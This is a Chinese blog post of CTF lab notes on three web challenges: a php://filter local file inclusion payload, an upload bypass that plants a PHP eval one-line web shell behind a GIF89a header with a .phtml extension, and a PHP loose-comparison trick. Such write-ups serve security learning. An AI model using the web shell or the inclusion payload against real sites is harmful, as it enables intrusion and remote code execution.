刷题学习记录

最新推荐文章于 2024-05-10 10:13:23 发布
最新推荐文章于 2024-05-10 10:13:23 发布
阅读量41 收藏
点赞数
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73861475/article/details/133797868
版权

[极客大挑战 2019]Secret File1

 直接看网页源码

 发现Archive_room.php文件,访问文件

 点击秘密

 回显太快了,直接就跳到end.php

那么就用bp抓包试一下

 发现  secr3t.php文件并访问

发现文件flag.php,尝试访问flag.php

 在发现有flag.php文件的时候,应该联想到伪协议的运用,访问不了flag文件就读取它

payload:secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php

base64解码得到flag

php伪协议

php伪协议

[ACTF2020 新生赛]Upload1

 

 文件上传要求上传的文件是jpg,png,gif

那就上传一句话木马以jpg的形式上传

  GIF89a
 <?php @eval($_POST['1234']);?>

 用bp抓包,并将后缀名更改为.php、.php5、php4、.php3、php2、php1、html、htm、phtml、pht、pHp、pHp5、pHp4、pHp3、pHp2、pHp1、Html、Htm、pHtml。但是php不能用,不会回显上传成功,那就用phtml

 拿到回显,用蚁剑连接

 查看文件就可以找到flag

[ACTF2020 新生赛]BackupFile1

 先用dirsearch扫描目录,得到index.php.bak,访问会提示下载

<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}

 

要求GET传入key,key只能为数字否则会执行exit("Just num!"),截取key的整数部分,如果==$str那么就会输出$flag,注意这里使用的是==而不是===,那么就是一个简单的弱比较问题

所以我们只需要传入key=123即可

 

知识点

is_numeric() 检测变量是否为数字或数字字符串

intval():获取变量的整数值

PHP: intval - Manual

PHP intval() 函数 | 菜鸟教程

PHP弱比较

正在努力中的小白♤
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
字节跳动数据结构学习笔记
Park33的博客
07-27 188
,相信这点大家从目录就可以看出来了!内容览阅下面会直接给大家展示其中部分内容的截图资料。字节跳动的岗位大多数看中的都是算法,所以说在算法部分不在强的小伙伴可以开始了,​这份资料没有别的优点,唯一的优点就是“...
笔记——java学习
05-12
笔记——java学习
C++学习笔记目录
日月既往,不可复追
10-10 680
笔记 为找工作做准备,记录心得与代码 力扣系列目录笔记一、数组【283】移动零二、字符串字符串匹配KMP算法 一、数组 【283】移动零 二、字符串 字符串匹配KMP算法
学习自用笔记
m0_52024881的博客
02-26 206
算法学习笔记
Gemini
03-15 139
算法1.数组 1.数组 二分查找(折半查找) 双指针(快慢指针、相向双指针)
二叉树学习笔记2
@@老胡的博客
04-05 594
上一篇:二叉树学习笔记1——框架 文章目录二叉树的重要性 二叉树的重要性 上一篇章有说到二叉树的两个思路:遍历和分解,而这两个思路,其实就是回溯算法和动态规划的思想。这次我们换一种说法:学过数据结构都知道快速排序和归并排序两种经典的排序算法,实际上,这两种排序的实现思想和框架和二叉树的思想框架大同小异。 ...
名震GitHub,字节跳动内部顶级数据结构学习笔记根本停不下来
python6_quanzhan的博客
11-16 4199
前段时间字节跳动发布了年前再招1万人的消息,从大部分的字节招聘岗位来说的话,Java研发岗位位居榜首! 这个消息一经发布就让大部分的程序员蠢蠢欲动,毕竟字节谁不想去? 字节跳动的岗位大多数看中的都是算法,所以说在算法部分不在强的小伙伴可以开始了,今天给大家带来的就是一份来自字节内部的《排序和数据结构学习笔记》拿他们的剑斩获他们的offfer“不香吗”? 这份资料没有别的优点,唯一的优点就是“全面”相信这点大家从目录就可以看出来了! 内容览阅 下面会直接给大家展示其中部分内容的截图资...
PythonLeetcode 数据结构与算法学习学习笔记。
Mr_zhouxin123的博客
07-05 784
PythonLeetcode 数据结构与算法学习学习笔记。
Leetcode 学习笔记
Free_FFF的博客
08-22 197
Leetcode
leetcode 1 two sum 学习笔记
u011689890的博客
08-05 343
本类博客用来记录分享自己在 LeetCode 过程中的的问以及学到的技巧等! 第一 Two sum Given an array of integers, return indices of the two numbers such that they add up to a specific target.You may assume that each input would ha
左神图片笔记
m0_48739934的博客
07-18 42
学习笔记
代码随想录+笔记记录
03-22
本文主要介绍代码随想录的笔记记录,方便读者更好地利用该网站进行学习。 ## 笔记记录的作用 笔记记录是代码随想录提供的一个功能,用于记录用户在过程中的解思路和方法。它可以帮助用户更好地...
GitHub一战封神,字节跳动内部顶级数据结构学习笔记根本停不下来(csdn)————程序.pdf
12-01
GitHub一战封神,字节跳动内部顶级数据结构学习笔记根本停不下来(csdn)————程序
滑动窗口笔记, 针对初学滑动窗口的人员合适
04-03
这个是我当时初学滑动窗口的时候学习的知识点,当时学习滑动窗口,主要是从双指针的角度入手学习,当时针对滑动窗口选取的经典的练习目,现在想要分享给大家
谷歌师兄的leetcode笔记-DeepLearningProject:深度学习项目
06-30
谷歌师兄的leetcode笔记使用 Tensorflow 和 Emuhawk 的 DQN 该项目包含允许 DQN 代理在 Pong、Mario Tennis 和 Super Smash Brothers(全部用于 N64)中学习和表现良好的代码。 它由一个 python 服务器(通过 ...
在做学习(54):点名
最新发布
yiren_liusong的博客
05-10 385
解法三:位运算 搞一个和原数组大小相同的数组,和原数组进行异或,最后看看剩下是哪一个数即可。O(n)空间+O(n)时间。解法二:哈希表 把原数组丢入哈希表,遍历哈希表,看看哪个数值为0即可。O(n)空间+O(n)时间。解法四:高斯求和 求和公式算出结果后,依次 - 数组中的元素,被减数剩下的就是结果。处理边界情况:如果数组缺的正好是最后一个位置,那么需要特殊处理。可以看出,数组和下标的对应关系,解法一:暴力枚举 O(n);对应的下标,就是缺的那个数字。
爬虫学习:XPath提取网页数据
qq_55038440的博客
05-07 549
上文初步了解了XPath的语法,这里介绍一个技巧,无需我们自己写XPath,使用浏览器自带工具即可,自动生成XPath。XPath是一种在XML文档中查找信息的语言,可以使用它在HTML源代码文档中通过元素、属性等方式进行查找和提取数据。获取标签属性值使用@属性名,以下案例获取了属性title值:@title。实例一:根据class属性进行匹配。实例三:根据name属性进行匹配。例:/div选取根元素div。例:XPath的常用语法格式。实例二:根据id属性进行匹配。选取此元素的所有子元素。
信息系统项目管理师(高项)--学习笔记【第3章:信息系统治理】
qq_28288835的博客
05-08 727
目录第3章 信息系统治理3.1 IT治理3.1.1IT治理基础3.1.2IT治理体系3.1.3IT治理任务3.1.4IT治理方法与标准3.2 IT审计3.2.1IT审计基础3.2.2IT审计方法与技术3.2.3审计流程3.2.4审计内容 第3章 信息系统治理 3.1 IT治理 3.1.1IT治理基础 作用:以组织战略为导向、实现IT与业务匹配为重心、以价值交付为成果、以绩效管理为控制手段 IT治理目标:与业务目标一致、有效利用信息与数据资源、风险管理 IT治理管理层次:最高管理层、 执行管理层、业务与服务
【android systrace学习
q_2474932226的博客
05-09 342
这里面基本涵盖了systrace的基础知识。
labuladong的笔记
09-12
总之,Labuladong的笔记以其思路清晰、逻辑严谨、举例详细和知识点整合等特点,为广大读者提供了一种深入学习和理解算法的有效途径。通过阅读他的笔记并进行实践,读者能够提高解能力,并在面对各种算法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值